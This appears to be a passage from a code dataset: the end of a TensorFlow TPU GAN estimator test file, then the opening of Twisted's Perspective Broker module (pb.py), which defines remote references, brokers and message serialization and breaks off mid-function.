from tensorflow.python.training import learning_rate_decay
from tensorflow.python.training import training
from tensorflow.python.training import training_util
FLAGS = flags.FLAGS
flags.DEFINE_bool('use_tpu', False, 'Whether to run test on TPU or not.')
def generator_fn(noise, mode):
del mode
return layers.fully_connected(noise, tensor_shape.dimension_value(
noise.shape[1]))
def discriminator_fn(data, unused_conditioning, mode):
del unused_conditioning, mode
return layers.fully_connected(data, 1)
def get_dummy_gan_model():
# TODO(joelshor): Find a better way of creating a variable scope.
with variable_scope.variable_scope('generator') as gen_scope:
gen_var = variable_scope.get_variable('dummy_var', initializer=0.0)
with variable_scope.variable_scope('discriminator') as dis_scope:
dis_var = variable_scope.get_variable('dummy_var', initializer=0.0)
return tfgan_tuples.GANModel(
generator_inputs=None,
generated_data=array_ops.ones([3, 4]),
generator_variables=[gen_var],
generator_scope=gen_scope,
generator_fn=None,
real_data=array_ops.zeros([3, 4]),
discriminator_real_outputs=array_ops.ones([1, 2, 3]) * dis_var,
discriminator_gen_outputs=array_ops.ones([1, 2, 3]) * gen_var * dis_var,
discriminator_variables=[dis_var],
discriminator_scope=dis_scope,
discriminator_fn=None)
def get_metrics(generator_inputs, generated_data, real_data,
discriminator_real_outputs, discriminator_gen_outputs):
del generator_inputs, discriminator_real_outputs, discriminator_gen_outputs
return {
'mse_custom_metric': metrics_lib.mean_squared_error(
real_data, generated_data)
}
class GetTPUEstimatorSpecTest(test.TestCase, parameterized.TestCase):
"""Tests that the EstimatorSpec is constructed appropriately."""
@classmethod
def setUpClass(cls):
super(GetTPUEstimatorSpecTest, cls).setUpClass()
cls._generator_optimizer = tpu_optimizer.CrossShardOptimizer(
training.GradientDescentOptimizer(1.0))
cls._discriminator_optimizer = tpu_optimizer.CrossShardOptimizer(
training.GradientDescentOptimizer(1.0))
@parameterized.named_parameters(
('joint_train', model_fn_lib.ModeKeys.TRAIN, True),
('train_sequential', model_fn_lib.ModeKeys.TRAIN, False),
('eval', model_fn_lib.ModeKeys.EVAL, None),
('predict', model_fn_lib.ModeKeys.PREDICT, None))
def test_get_estimator_spec(self, mode, joint_train):
with ops.Graph().as_default():
self._gan_model = get_dummy_gan_model()
spec = estimator._get_estimator_spec(
mode,
self._gan_model,
generator_loss_fn=losses.wasserstein_generator_loss,
discriminator_loss_fn=losses.wasserstein_discriminator_loss,
get_eval_metric_ops_fn=get_metrics,
generator_optimizer=self._generator_optimizer,
discriminator_optimizer=self._discriminator_optimizer,
joint_train=joint_train,
is_on_tpu=FLAGS.use_tpu,
gan_train_steps=tfgan_tuples.GANTrainSteps(1, 1))
self.assertIsInstance(spec, tpu_estimator.TPUEstimatorSpec)
self.assertEqual(mode, spec.mode)
if mode == model_fn_lib.ModeKeys.PREDICT:
self.assertEqual({'generated_data': self._gan_model.generated_data},
spec.predictions)
elif mode == model_fn_lib.ModeKeys.TRAIN:
self.assertShapeEqual(np.array(0), spec.loss) # must be a scalar
self.assertIsNotNone(spec.train_op)
self.assertIsNotNone(spec.training_hooks)
elif mode == model_fn_lib.ModeKeys.EVAL:
self.assertEqual(self._gan_model.generated_data, spec.predictions)
self.assertShapeEqual(np.array(0), spec.loss) # must be a scalar
self.assertIsNotNone(spec.eval_metrics)
class TPUGANEstimatorIntegrationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
super(TPUGANEstimatorIntegrationTest, self).setUp()
self._model_dir = tempfile.mkdtemp()
self._config = tpu_config.RunConfig(model_dir=self._model_dir)
def tearDown(self):
super(TPUGANEstimatorIntegrationTest, self).tearDown()
if self._model_dir:
writer_cache.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def _test_complete_flow(
self, train_input_fn, eval_input_fn, predict_input_fn, prediction_size,
lr_decay=False, joint_train=True):
def make_opt():
gstep = training_util.get_or_create_global_step()
lr = learning_rate_decay.exponential_decay(1.0, gstep, 10, 0.9)
return training.GradientDescentOptimizer(lr)
gopt = make_opt if lr_decay else training.GradientDescentOptimizer(1.0)
dopt = make_opt if lr_decay else training.GradientDescentOptimizer(1.0)
est = estimator.TPUGANEstimator(
generator_fn=generator_fn,
discriminator_fn=discriminator_fn,
generator_loss_fn=losses.wasserstein_generator_loss,
discriminator_loss_fn=losses.wasserstein_discriminator_loss,
generator_optimizer=gopt,
discriminator_optimizer=dopt,
joint_train=joint_train,
get_eval_metric_ops_fn=get_metrics,
train_batch_size=4,
eval_batch_size=10,
predict_batch_size=8,
use_tpu=FLAGS.use_tpu,
config=self._config)
# Train.
num_steps_train = 10
est.train(train_input_fn, steps=num_steps_train)
# Evaluate.
num_steps_eval = 2
scores = est.evaluate(eval_input_fn, steps=num_steps_eval)
self.assertIn(ops.GraphKeys.GLOBAL_STEP, scores)
self.assertIn('loss', scores)
self.assertEqual(scores['discriminator_loss'] + scores['generator_loss'],
scores['loss'])
self.assertIn('mse_custom_metric', scores)
# Predict.
predictions = np.array([x['generated_data'] for x in
est.predict(predict_input_fn)])
self.assertAllEqual(prediction_size, predictions.shape)
@parameterized.named_parameters(
('joint_train', True, False, False),
('train_sequential', False, False, False),
('lr_decay', False, True, False),
('train_sequential_ds', False, False, True))
def test_numpy_input_fn(self, joint_train, lr_decay, return_ds):
"""Tests complete flow with numpy_input_fn."""
input_dim = 4
def train_input_fn(params):
data = np.zeros([input_dim], dtype=np.float32)
ds = (dataset_ops.Dataset
.from_tensors((data, data))
.repeat()
.batch(params['batch_size'], drop_remainder=True))
if return_ds:
return ds
else:
x, y = ds.make_one_shot_iterator().get_next()
return x, y
def eval_input_fn(params):
data = np.zeros([input_dim], dtype=np.float32)
ds = (dataset_ops.Dataset
.from_tensors((data, data))
.repeat()
.batch(params['batch_size'], drop_remainder=True))
if return_ds:
return ds
else:
x, y = ds.make_one_shot_iterator().get_next()
return x, y
predict_size = 10
def predict_input_fn(params):
del params # unused
data = np.zeros([input_dim], dtype=np.float32)
ds = (dataset_ops.Dataset
.from_tensors(data)
.repeat(predict_size)
.batch(1, drop_remainder=True))
return ds
self._test_complete_flow(
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
prediction_size=[predict_size, input_dim],
lr_decay=lr_decay,
joint_train=joint_train)
class TPUGANEstimatorWarmStartTest(test.TestCase):
def setUp(self):
self._model_dir = self.get_temp_dir()
self._config = tpu_config.RunConfig(model_dir=self._model_dir)
self.new_variable_name = 'new_var'
self.new_variable_value = [1.0, 2.0, 3.0]
def tearDown(self):
writer_cache.FileWriterCache.clear()
def _test_warm_start(self, warm_start_from=None):
"""Tests whether WarmStartSettings work as intended."""
def generator_with_new_variable(noise_dict, mode):
variable_scope.get_variable(name=self.new_variable_name,
initializer=self.new_variable_value,
trainable=True)
return generator_fn(noise_dict, mode)
est = estimator.TPUGANEstimator(
generator_fn=generator_fn,
discriminator_fn=discriminator_fn,
generator_loss_fn=losses.wasserstein_generator_loss,
discriminator_loss_fn=losses.wasserstein_discriminator_loss,
generator_optimizer=training.GradientDescentOptimizer(1.0),
discriminator_optimizer=training.GradientDescentOptimizer(1.0),
train_batch_size=4,
use_tpu=FLAGS.use_tpu,
config=self._config)
def train_input_fn(params):
data = np.zeros([params['batch_size'], 4], dtype=np.float32)
return data, data
est.train(train_input_fn, steps=1)
est_warm = estimator.TPUGANEstimator(
generator_fn=generator_with_new_variable,
discriminator_fn=discriminator_fn,
generator_loss_fn=losses.wasserstein_generator_loss,
discriminator_loss_fn=losses.wasserstein_discriminator_loss,
generator_optimizer=training.GradientDescentOptimizer(1.0),
discriminator_optimizer=training.GradientDescentOptimizer(1.0),
config=tpu_config.RunConfig(
model_dir=None if warm_start_from else self._model_dir),
train_batch_size=4,
use_tpu=FLAGS.use_tpu,
warm_start_from=warm_start_from)
est_warm.train(train_input_fn, steps=1)
return est_warm
def test_warm_start_error(self):
"""Test if exception when reloading different estimators."""
with self.assertRaises(NotFoundError):
self._test_warm_start()
def test_warm_start_success(self):
"""Test if GANEstimator allows explicit warm start variable assignment."""
# Regex matches all variable names in ckpt except for new_var.
var_regex = '^(?!.*%s.*)' % self.new_variable_name
warmstart = WarmStartSettings(ckpt_to_initialize_from=self._model_dir,
vars_to_warm_start=var_regex)
est_warm = self._test_warm_start(warm_start_from=warmstart)
full_variable_name = 'Generator/%s' % self.new_variable_name
self.assertIn(full_variable_name, est_warm.get_variable_names())
equal_vals = np.array_equal(est_warm.get_variable_value(full_variable_name),
self.new_variable_value)
self.assertTrue(equal_vals)
if __name__ == '__main__':
test.main()
|
kohnle-lernmodule/exe201based | refs/heads/master | twisted/spread/pb.py | 14 | # -*- test-case-name: twisted.test.test_pb -*-
#
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Perspective Broker
\"This isn\'t a professional opinion, but it's probably got enough
internet to kill you.\" --glyph
Stability: semi-stable
Future Plans: The connection APIs will be extended with support for
URLs, that will be able to extend resource location and discovery
conversations and specify different authentication mechanisms besides
username/password. This should only add to, and not change, the
existing protocol.
Important Changes
=================
New APIs have been added for serving and connecting. On the client
side, use PBClientFactory.getPerspective() instead of connect(), and
PBClientFactory.getRootObject() instead of getObjectAt(). Server side
should switch to updated cred APIs by using PBServerFactory, at which
point clients would switch to PBClientFactory.login().
The new cred support means a different method is sent for login,
although the protocol is compatible on the binary level. When we
switch to pluggable credentials this will introduce another change,
although the current change will still be supported.
The Perspective class is now deprecated, and has been replaced with
Avatar, which does not rely on the old cred APIs.
Introduction
============
This is a broker for proxies for and copies of objects. It provides a
translucent interface layer to those proxies.
The protocol is not opaque, because it provides objects which
represent the remote proxies and require no context (server
references, IDs) to operate on.
It is not transparent because it does I{not} attempt to make remote
objects behave identically, or even similiarly, to local objects.
Method calls are invoked asynchronously, and specific rules are
applied when serializing arguments.
@author: U{Glyph Lefkowitz<mailto:[email protected]>}
"""
__version__ = "$Revision: 1.157 $"[11:-2]
# System Imports
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import sys
import types
import warnings
# Twisted Imports
from twisted.python import log, failure, components, reflect
from twisted.internet import reactor, defer, protocol, error
from twisted.cred import authorizer, service, perspective, identity
from twisted.cred.portal import Portal
from twisted.persisted import styles
from twisted.python.components import Interface, registerAdapter, backwardsCompatImplements
from twisted.python.components import backwardsCompatImplements
from zope.interface import implements
# Sibling Imports
from twisted.spread.interfaces import IJellyable, IUnjellyable
from jelly import jelly, unjelly, globalSecurity
import banana
# Tightly coupled sibling import
from flavors import Serializable
from flavors import Referenceable, NoSuchMethod
from flavors import Root, IPBRoot
from flavors import ViewPoint
from flavors import Viewable
from flavors import Copyable
from flavors import Jellyable
from flavors import Cacheable
from flavors import RemoteCopy
from flavors import RemoteCache
from flavors import RemoteCacheObserver
from flavors import copyTags
from flavors import setCopierForClass, setUnjellyableForClass
from flavors import setFactoryForClass
from flavors import setCopierForClassTree
MAX_BROKER_REFS = 1024
portno = 8787
class ProtocolError(Exception):
"""
This error is raised when an invalid protocol statement is received.
"""
class DeadReferenceError(ProtocolError):
"""
This error is raised when a method is called on a dead reference (one whose
broker has been disconnected).
"""
class Error(Exception):
"""
This error can be raised to generate known error conditions.
When a PB callable method (perspective_, remote_, view_) raises
this error, it indicates that a traceback should not be printed,
but instead, the string representation of the exception should be
sent.
"""
class RemoteMethod:
"""This is a translucent reference to a remote message.
"""
def __init__(self, obj, name):
"""Initialize with a L{RemoteReference} and the name of this message.
"""
self.obj = obj
self.name = name
def __cmp__(self, other):
return cmp((self.obj, self.name), other)
def __hash__(self):
return hash((self.obj, self.name))
def __call__(self, *args, **kw):
"""Asynchronously invoke a remote method.
"""
return self.obj.broker._sendMessage('',self.obj.perspective, self.obj.luid, self.name, args, kw)
def noOperation(*args, **kw):
"""Do nothing.
Neque porro quisquam est qui dolorem ipsum quia dolor sit amet,
consectetur, adipisci velit...
"""
class PBConnectionLost(Exception):
pass
def printTraceback(tb):
"""Print a traceback (string) to the standard log.
"""
log.msg('Perspective Broker Traceback:' )
log.msg(tb)
class IPerspective(Interface):
"""
per*spec*tive, n. : The relationship of aspects of a subject to each
other and to a whole: 'a perspective of history'; 'a need to view
the problem in the proper perspective'.
This is a Perspective Broker-specific wrapper for an avatar. That
is to say, a PB-published view on to the business logic for the
system's concept of a 'user'.
The concept of attached/detached is no longer implemented by the
framework. The realm is expected to implement such semantics if
needed.
"""
def perspectiveMessageReceived(self, broker, message, args, kwargs):
"""
This method is called when a network message is received.
@arg broker: The Perspective Broker.
@type message: str
@arg message: The name of the method called by the other end.
@type args: list in jelly format
@arg args: The arguments that were passed by the other end. It
is recommend that you use the `unserialize' method of the
broker to decode this.
@type kwargs: dict in jelly format
@arg kwargs: The keyword arguments that were passed by the
other end. It is recommended that you use the
`unserialize' method of the broker to decode this.
@rtype: A jelly list.
@return: It is recommended that you use the `serialize' method
of the broker on whatever object you need to return to
generate the return value.
"""
class Avatar:
"""A default IPerspective implementor.
This class is intended to be subclassed, and a realm should return
an instance of such a subclass when IPerspective is requested of
it.
A peer requesting a perspective will receive only a
L{RemoteReference} to a pb.Avatar. When a method is called on
that L{RemoteReference}, it will translate to a method on the
remote perspective named 'perspective_methodname'. (For more
information on invoking methods on other objects, see
L{flavors.ViewPoint}.)
"""
implements(IPerspective)
def perspectiveMessageReceived(self, broker, message, args, kw):
"""This method is called when a network message is received.
I will call::
| self.perspective_%(message)s(*broker.unserialize(args),
| **broker.unserialize(kw))
to handle the method; subclasses of Avatar are expected to
implement methods of this naming convention.
"""
args = broker.unserialize(args, self)
kw = broker.unserialize(kw, self)
method = getattr(self, "perspective_%s" % message)
try:
state = method(*args, **kw)
except TypeError:
log.msg("%s didn't accept %s and %s" % (method, args, kw))
raise
return broker.serialize(state, self, method, args, kw)
components.backwardsCompatImplements(Avatar)
class Perspective(perspective.Perspective, Avatar):
"""
This class is DEPRECATED, because it relies on old cred
APIs. Please use L{Avatar}.
"""
def brokerAttached(self, reference, identity, broker):
"""An intermediary method to override.
Normally you will want to use 'attached', as described in
L{twisted.cred.perspective.Perspective}.attached; however, this method
serves the same purpose, and in some circumstances, you are sure that
the protocol that objects will be attaching to your Perspective with is
Perspective Broker, and in that case you may wish to get the Broker
object they are connecting with, for example, to determine what host
they are connecting from. Bear in mind that when overriding this
method, other, non-PB protocols will not notify you of being attached
or detached.
"""
warnings.warn("pb.Perspective is deprecated, please use pb.Avatar.", DeprecationWarning, 2)
return self.attached(reference, identity)
def brokerDetached(self, reference, identity, broker):
"""See L{brokerAttached}.
"""
return self.detached(reference, identity)
class Service(service.Service):
"""A service for Perspective Broker.
This class is DEPRECATED, because it relies on old cred APIs.
On this Service, the result of a perspective request must be a
L{pb.Perspective} rather than a L{twisted.cred.perspective.Perspective}.
"""
perspectiveClass = Perspective
class AsReferenceable(Referenceable):
"""AsReferenceable: a reference directed towards another object.
"""
def __init__(self, object, messageType="remote"):
"""Initialize me with an object.
"""
self.remoteMessageReceived = getattr(object, messageType + "MessageReceived")
class RemoteReference(Serializable, styles.Ephemeral):
"""This is a translucent reference to a remote object.
I may be a reference to a L{flavors.ViewPoint}, a
L{flavors.Referenceable}, or an L{IPerspective} implementor (e.g.,
pb.Avatar). From the client's perspective, it is not possible to
tell which except by convention.
I am a \"translucent\" reference because although no additional
bookkeeping overhead is given to the application programmer for
manipulating a reference, return values are asynchronous.
See also L{twisted.internet.defer}.
@ivar broker: The broker I am obtained through.
@type broker: L{Broker}
"""
implements(IUnjellyable)
def __init__(self, perspective, broker, luid, doRefCount):
"""(internal) Initialize me with a broker and a locally-unique ID.
The ID is unique only to the particular Perspective Broker
instance.
"""
self.luid = luid
self.broker = broker
self.doRefCount = doRefCount
self.perspective = perspective
self.disconnectCallbacks = []
def notifyOnDisconnect(self, callback):
"""Register a callback to be called if our broker gets disconnected.
This callback will be called with one argument, this instance.
"""
assert callable(callback)
self.disconnectCallbacks.append(callback)
if len(self.disconnectCallbacks) == 1:
self.broker.notifyOnDisconnect(self._disconnected)
def dontNotifyOnDisconnect(self, callback):
"""Remove a callback that was registered with notifyOnDisconnect."""
self.disconnectCallbacks.remove(callback)
if not self.disconnectCallbacks:
self.broker.dontNotifyOnDisconnect(self._disconnected)
def _disconnected(self):
"""Called if we are disconnected and have callbacks registered."""
for callback in self.disconnectCallbacks:
callback(self)
self.disconnectCallbacks = None
def jellyFor(self, jellier):
"""If I am being sent back to where I came from, serialize as a local backreference.
"""
if jellier.invoker:
assert self.broker == jellier.invoker, "Can't send references to brokers other than their own."
return "local", self.luid
else:
return "unpersistable", "References cannot be serialized"
def unjellyFor(self, unjellier, unjellyList):
self.__init__(unjellier.invoker.unserializingPerspective, unjellier.invoker, unjellyList[1], 1)
return self
def callRemote(self, _name, *args, **kw):
"""Asynchronously invoke a remote method.
@type _name: C{string}
@param _name: the name of the remote method to invoke
@param args: arguments to serialize for the remote function
@param kw: keyword arguments to serialize for the remote function.
@rtype: L{twisted.internet.defer.Deferred}
@returns: a Deferred which will be fired when the result of
this remote call is received.
"""
# note that we use '_name' instead of 'name' so the user can call
# remote methods with 'name' as a keyword parameter, like this:
# ref.callRemote("getPeopleNamed", count=12, name="Bob")
return self.broker._sendMessage('',self.perspective, self.luid,
_name, args, kw)
def remoteMethod(self, key):
"""Get a L{RemoteMethod} for this key.
"""
return RemoteMethod(self, key)
def __cmp__(self,other):
"""Compare me [to another L{RemoteReference}].
"""
if isinstance(other, RemoteReference):
if other.broker == self.broker:
return cmp(self.luid, other.luid)
return cmp(self.broker, other)
def __hash__(self):
"""Hash me.
"""
return self.luid
def __del__(self):
"""Do distributed reference counting on finalization.
"""
if self.doRefCount:
self.broker.sendDecRef(self.luid)
setUnjellyableForClass("remote", RemoteReference)
components.backwardsCompatImplements(RemoteReference)
class Local:
"""(internal) A reference to a local object.
"""
def __init__(self, object, perspective=None):
"""Initialize.
"""
self.object = object
self.perspective = perspective
self.refcount = 1
def __repr__(self):
return "<pb.Local %r ref:%s>" % (self.object, self.refcount)
def incref(self):
"""Increment and return my reference count.
"""
self.refcount = self.refcount + 1
return self.refcount
def decref(self):
"""Decrement and return my reference count.
"""
self.refcount = self.refcount - 1
return self.refcount
class _RemoteCacheDummy:
"""Ignore.
"""
##
# Failure
##
class CopyableFailure(failure.Failure, Copyable):
"""
A L{flavors.RemoteCopy} and L{flavors.Copyable} version of
L{twisted.python.failure.Failure} for serialization.
"""
unsafeTracebacks = 0
def getStateToCopy(self):
#state = self.__getstate__()
state = self.__dict__.copy()
state['tb'] = None
state['frames'] = []
state['stack'] = []
if isinstance(self.value, failure.Failure):
state['value'] = failure2Copyable(self.value, self.unsafeTracebacks)
else:
state['value'] = str(self.value) # Exception instance
state['type'] = str(self.type) # Exception class
if self.unsafeTracebacks:
io = StringIO.StringIO()
self.printTraceback(io)
state['traceback'] = io.getvalue()
else:
state['traceback'] = 'Traceback unavailable\n'
return state
class CopiedFailure(RemoteCopy, failure.Failure):
def printTraceback(self, file=None, elideFrameworkCode=0, detail='default'):
if file is None:
file = log.logfile
file.write("Traceback from remote host -- ")
file.write(self.traceback)
printBriefTraceback = printTraceback
printDetailedTraceback = printTraceback
setUnjellyableForClass(CopyableFailure, CopiedFailure)
def failure2Copyable(fail, unsafeTracebacks=0):
f = CopyableFailure()
f.__dict__ = fail.__dict__
f.unsafeTracebacks = unsafeTracebacks
return f
class Broker(banana.Banana):
"""I am a broker for objects.
"""
version = 6
username = None
factory = None
def __init__(self, isClient=1, security=globalSecurity):
banana.Banana.__init__(self, isClient)
self.disconnected = 0
self.disconnects = []
self.failures = []
self.connects = []
self.localObjects = {}
self.security = security
self.pageProducers = []
self.currentRequestID = 0
self.currentLocalID = 0
# Some terms:
# PUID: process unique ID; return value of id() function. type "int".
# LUID: locally unique ID; an ID unique to an object mapped over this
# connection. type "int"
# GUID: (not used yet) globally unique ID; an ID for an object which
# may be on a redirected or meta server. Type as yet undecided.
# Dictionary mapping LUIDs to local objects.
# set above to allow root object to be assigned before connection is made
# self.localObjects = {}
# Dictionary mapping PUIDs to LUIDs.
self.luids = {}
# Dictionary mapping LUIDs to local (remotely cached) objects. Remotely
# cached means that they're objects which originate here, and were
# copied remotely.
self.remotelyCachedObjects = {}
# Dictionary mapping PUIDs to (cached) LUIDs
self.remotelyCachedLUIDs = {}
# Dictionary mapping (remote) LUIDs to (locally cached) objects.
self.locallyCachedObjects = {}
self.waitingForAnswers = {}
def resumeProducing(self):
"""Called when the consumer attached to me runs out of buffer.
"""
# Go backwards over the list so we can remove indexes from it as we go
for pageridx in xrange(len(self.pageProducers)-1, -1, -1):
pager = self.pageProducers[pageridx]
pager.sendNextPage()
if not pager.stillPaging():
del self.pageProducers[pageridx]
if not self.pageProducers:
self.transport.unregisterProducer()
# Streaming producer methods; not necessary to implement.
def pauseProducing(self):
pass
def stopProducing(self):
pass
def registerPageProducer(self, pager):
self.pageProducers.append(pager)
if len(self.pageProducers) == 1:
self.transport.registerProducer(self, 0)
def expressionReceived(self, sexp):
"""Evaluate an expression as it's received.
"""
if isinstance(sexp, types.ListType):
command = sexp[0]
methodName = "proto_%s" % command
method = getattr(self, methodName, None)
if method:
method(*sexp[1:])
else:
self.sendCall("didNotUnderstand", command)
else:
raise ProtocolError("Non-list expression received.")
def proto_version(self, vnum):
"""Protocol message: (version version-number)
Check to make sure that both ends of the protocol are speaking
the same version dialect.
"""
if vnum != self.version:
raise ProtocolError("Version Incompatibility: %s %s" % (self.version, vnum))
def sendCall(self, *exp):
"""Utility method to send an expression to the other side of the connection.
"""
self.sendEncoded(exp)
def proto_didNotUnderstand(self, command):
"""Respond to stock 'C{didNotUnderstand}' message.
Log the command that was not understood and continue. (Note:
this will probably be changed to close the connection or raise
an exception in the future.)
"""
log.msg("Didn't understand command: %r" % command)
def connectionReady(self):
"""Initialize. Called after Banana negotiation is done.
"""
self.sendCall("version", self.version)
for notifier in self.connects:
try:
notifier()
except:
log.deferr()
self.connects = None
if self.factory: # in tests we won't have factory
self.factory.clientConnectionMade(self)
def connectionFailed(self):
# XXX should never get called anymore? check!
for notifier in self.failures:
try:
notifier()
except:
log.deferr()
self.failures = None
waitingForAnswers = None
def connectionLost(self, reason):
"""The connection was lost.
"""
self.disconnected = 1
# nuke potential circular references.
self.luids = None
if self.waitingForAnswers:
for d in self.waitingForAnswers.values():
try:
d.errback(failure.Failure(PBConnectionLost(reason)))
except:
log.deferr()
# Assure all Cacheable.stoppedObserving are called
for lobj in self.remotelyCachedObjects.values():
cacheable = lobj.object
perspective = lobj.perspective
try:
cacheable.stoppedObserving(perspective, RemoteCacheObserver(self, cacheable, perspective))
except:
log.deferr()
# Loop on a copy to prevent notifiers to mixup
# the list by calling dontNotifyOnDisconnect
for notifier in self.disconnects[:]:
try:
notifier()
except:
log.deferr()
self.disconnects = None
self.waitingForAnswers = None
self.localSecurity = None
self.remoteSecurity = None
self.remotelyCachedObjects = None
self.remotelyCachedLUIDs = None
self.locallyCachedObjects = None
self.localObjects = None
def notifyOnDisconnect(self, notifier):
"""Call the given callback when the Broker disconnects."""
assert callable(notifier)
self.disconnects.append(notifier)
def notifyOnFail(self, notifier):
"""Call the given callback if the Broker fails to connect."""
assert callable(notifier)
self.failures.append(notifier)
def notifyOnConnect(self, notifier):
"""Call the given callback when the Broker connects."""
assert callable(notifier)
if self.connects is None:
try:
notifier()
except:
log.err()
else:
self.connects.append(notifier)
def dontNotifyOnDisconnect(self, notifier):
"""Remove a callback from list of disconnect callbacks."""
try:
self.disconnects.remove(notifier)
except ValueError:
pass
def localObjectForID(self, luid):
"""Get a local object for a locally unique ID.
I will return an object previously stored with
self.L{registerReference}, or C{None} if XXX:Unfinished thought:XXX
"""
lob = self.localObjects.get(luid)
if lob is None:
return
return lob.object
maxBrokerRefsViolations = 0
def registerReference(self, object):
"""Get an ID for a local object.
Store a persistent reference to a local object and map its id()
to a generated, session-unique ID and return that ID.
"""
assert object is not None
puid = object.processUniqueID()
luid = self.luids.get(puid)
if luid is None:
if len(self.localObjects) > MAX_BROKER_REFS:
self.maxBrokerRefsViolations = self.maxBrokerRefsViolations + 1
if self.maxBrokerRefsViolations > 3:
self.transport.loseConnection()
raise Error("Maximum PB reference count exceeded. "
"Goodbye.")
raise Error("Maximum PB reference count exceeded.")
luid = self.newLocalID()
self.localObjects[luid] = Local(object)
self.luids[puid] = luid
else:
self.localObjects[luid].incref()
return luid
def setNameForLocal(self, name, object):
"""Store a special (string) ID for this object.
This is how you specify a 'base' set of objects that the remote
protocol can connect to.
"""
assert object is not None
self.localObjects[name] = Local(object)
def remoteForName(self, name):
"""Returns an object from the remote name mapping.
Note that this does not check the validity of the name, only
creates a translucent reference for it.
"""
return RemoteReference(None, self, name, 0)
def cachedRemotelyAs(self, instance, incref=0):
"""Returns an ID that says what this instance is cached as remotely, or C{None} if it's not.
"""
puid = instance.processUniqueID()
luid = self.remotelyCachedLUIDs.get(puid)
if (luid is not None) and (incref):
self.remotelyCachedObjects[luid].incref()
return luid
def remotelyCachedForLUID(self, luid):
"""Returns an instance which is cached remotely, with this LUID.
"""
return self.remotelyCachedObjects[luid].object
def cacheRemotely(self, instance):
"""
XXX"""
puid = instance.processUniqueID()
luid = self.newLocalID()
if len(self.remotelyCachedObjects) > MAX_BROKER_REFS:
self.maxBrokerRefsViolations = self.maxBrokerRefsViolations + 1
if self.maxBrokerRefsViolations > 3:
self.transport.loseConnection()
raise Error("Maximum PB cache count exceeded. "
"Goodbye.")
raise Error("Maximum PB cache count exceeded.")
self.remotelyCachedLUIDs[puid] = luid
# This table may not be necessary -- for now, it's to make sure that no
# monkey business happens with id(instance)
self.remotelyCachedObjects[luid] = Local(instance, self.serializingPerspective)
return luid
def cacheLocally(self, cid, instance):
"""(internal)
Store a non-filled-out cached instance locally.
"""
self.locallyCachedObjects[cid] = instance
def cachedLocallyAs(self, cid):
instance = self.locallyCachedObjects[cid]
return instance
def serialize(self, object, perspective=None, method=None, args=None, kw=None):
"""Jelly an object according to the remote security rules for this broker.
"""
if isinstance(object, defer.Deferred):
object.addCallbacks(self.serialize, lambda x: x,
callbackKeywords={
'perspective': perspective,
'method': method,
'args': args,
'kw': kw
})
return object
# XXX This call is NOT REENTRANT and testing for reentrancy is just
# crazy, so it likely won't be. Don't ever write methods that call the
# broker's serialize() method recursively (e.g. sending a method call
# from within a getState (this causes concurrency problems anyway so
# you really, really shouldn't do it))
# self.jellier = _NetJellier(self)
self.serializingPerspective = perspective
self.jellyMethod = method
self.jellyArgs = args
self.jellyKw = kw
try:
return jelly(object, self.security, None, self)
finally:
self.serializingPerspective = None
self.jellyMethod = None
self.jellyArgs = None
self.jellyKw = None
def unserialize(self, sexp, perspective = None):
"""Unjelly an sexp according to the local security rules for this broker.
"""
self.unserializingPerspective = perspective
try:
return unjelly(sexp, self.security, None, self)
finally:
self.unserializingPerspective = None
def newLocalID(self):
"""Generate a new LUID.
"""
self.currentLocalID = self.currentLocalID + 1
return self.currentLocalID
def newRequestID(self):
"""Generate a new request ID.
"""
self.currentRequestID = self.currentRequestID + 1
return self.currentRequestID
def _sendMessage(self, prefix, perspective, objectID, message, args, kw):
pbc = None
pbe = None
answerRequired = 1
if kw.has_key('pbcallback'):
pbc = kw['pbcallback']
del kw['pbcallback']
if kw.has_key('pberrback'):
pbe = kw['pberrback']
del kw['pberrback']
if kw.has_key('pbanswer'):
assert (not pbe) and (not pbc), "You can't specify a no-answer requirement."
answerRequired = kw['pbanswer']
del kw['pbanswer']
if self.disconnected:
raise DeadReferenceError("Calling Stale Broker")
try:
netArgs = self.serialize(args, perspective=perspective, method=message)
netKw = self.serialize(kw, perspective=perspective, method=message)
except:
return defer.fail(failure.Failure())
requestID = self.newRequestID()
if answerRequired:
rval = defer.Deferred()
self.waitingForAnswers[requestID] = rval
if pbc or pbe:
log.msg('warning! using deprecated "pbcallback"')
rval.addCallbacks(pbc, pbe)
else:
rval = None
self.sendCall(prefix+"message", requestID, objectID, message, answerRequired, netArgs, netKw)
return rval
def proto_message(self, requestID, objectID, message, answerRequired, netArgs, netKw):
self._recvMessage(self.localObjectForID, requestID, objectID, message, answerRequired, netArgs, netKw)
def proto_cachemessage(self, requestID, objectID, message, answerRequired, netArgs, netKw):
self._recvMessage(self.cachedLocallyAs, requestID, objectID, message, answerRequired, netArgs, netKw)
def _recvMessage(self, findObjMethod, requestID, objectID, message, answerRequired, netArgs, netKw):
"""Received a message-send.
Look up message based on object, unserialize the arguments, and
invoke it with args, and send an 'answer' or 'error' response.
"""
try:
object = findObjMethod(objectID)
if object is None:
raise Error("Invalid Object ID")
netResult = object.remoteMessageReceived(self, message, netArgs, netKw)
except Error, e:
if answerRequired:
# If the error is Jellyable or explicitly allowed via our
# security options, send it back and let the code on the
# other end deal with unjellying. If it isn't Jellyable,
# wrap it in a CopyableFailure, which ensures it can be
# unjellied on the other end. We have to do this because
# all errors must be sent back.
if isinstance(e, Jellyable) or self.security.isClassAllowed(e.__class__):
self._sendError(e, requestID)
else:
self._sendError(CopyableFailure(e), requestID)
except:
if answerRequired:
log.msg("Peer will receive following PB traceback:", isError=True)
f = CopyableFailure()
self._sendError(f, requestID)
log.deferr()
else:
if answerRequired:
if isinstance(netResult, defer.Deferred):
args = (requestID,)
netResult.addCallbacks(self._sendAnswer, self._sendFailure,
callbackArgs=args, errbackArgs=args)
# XXX Should this be done somewhere else?
else:
self._sendAnswer(netResult, requestID)
##
# success
##
def _sendAnswer(self, netResult, requestID):
"""(internal) Send an answer to a previously sent message.
"""
self.sendCall("answer", requestID, netResult)
def proto_answer(self, requestID, netResult):
"""(internal) Got an answer to a previously sent message.
Look up the appropriate callback and call it.
"""
d = self.waitingForAnswers[requestID]
del self.waitingForAnswers[requestID]
d.callback(self.unserialize(netResult))
##
# failure
##
def _sendFailure(self, fail, requestID):
"""Log error and then send it."""
log.msg("Peer will receive following PB traceback:")
